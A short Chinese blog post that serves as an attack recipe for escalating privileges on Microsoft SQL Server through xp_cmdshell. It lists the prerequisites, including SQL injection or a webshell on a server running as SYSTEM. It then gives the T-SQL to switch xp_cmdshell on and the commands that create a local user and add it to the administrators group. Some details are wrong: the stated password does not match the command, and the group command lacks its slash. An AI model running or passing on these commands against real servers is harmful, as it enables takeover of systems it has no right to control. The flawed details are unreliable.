美文网首页sql注入
【提权】MSSQL提权之xp_cmdshell

【提权】MSSQL提权之xp_cmdshell

作者: Pino_HD | 来源:发表于2018-04-22 18:56 被阅读530次

0x01 前提

  1. getshell或者存在sql注入并且能够执行命令。

  2. sql server是system权限,sql server默认就是system权限。

0x02 xp_cmdshell

有了xp_cmdshell的话可以执行系统命令,该组件默认是关闭的,因此需要把它打开。

开启xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

关闭xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure

0x03 提权

exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用户test,密码test
exec master..xp_cmdshell 'net localgroup administrators test add'    添加test用户到管理员组

相关文章

  • 【提权】MSSQL提权之xp_cmdshell

    0x01 前提 getshell或者存在sql注入并且能够执行命令。 sql server是system权限,sq...

  • 17.提权

    提权方法:溢出漏洞提权、数据库提权(mysql提权(udf提权,mof提权,自启动提权)、mssql提权)、第三方...

  • 【提权】MSSQL提权之sp_oacreate

    0x01 前提 如果xp_cmdshell组件被删除了话,还可以使用sp_oacreate来进行提权。 0x02 ...

  • sqlserver提权(xp_cmdshell、sp_oacre

    1 XP_CMDSHELL 提权 连接数据库之后首先先看下xp_cmdshell 组件是否存在 SELECT co...

  • 【提权】MySQL提权之MOF

    0x01 前言 Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件: ...

  • 【提权】MySQL提权之UDF

    0x01 UDF UDF(user defined function)用户自定义函数,是mysql的一个拓展接口。...

  • mysql提权之mof提权

    拿下webshell之后当前权限仅限于对网站文件的操作,想要获取对主机的操作还需进一步提权 首先介绍mof提权,直...

  • mysql提权之udf提权

    提权的前提 mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下...

  • linux 提权-Crontab提权

    前言 记录一下linux提权系列的Crontab计划任务提权的学习过程。 crontab 命令 crontab命令...

  • linux 提权-SUID提权

    前言 最近想着学习linux提权的一些姿势,这里简单分享学习SUID提权的一些知识点。 权限解读 先来父复习一下l...

网友评论

    本文标题:【提权】MSSQL提权之xp_cmdshell

    本文链接:https://www.haomeiwen.com/subject/rsvclftx.html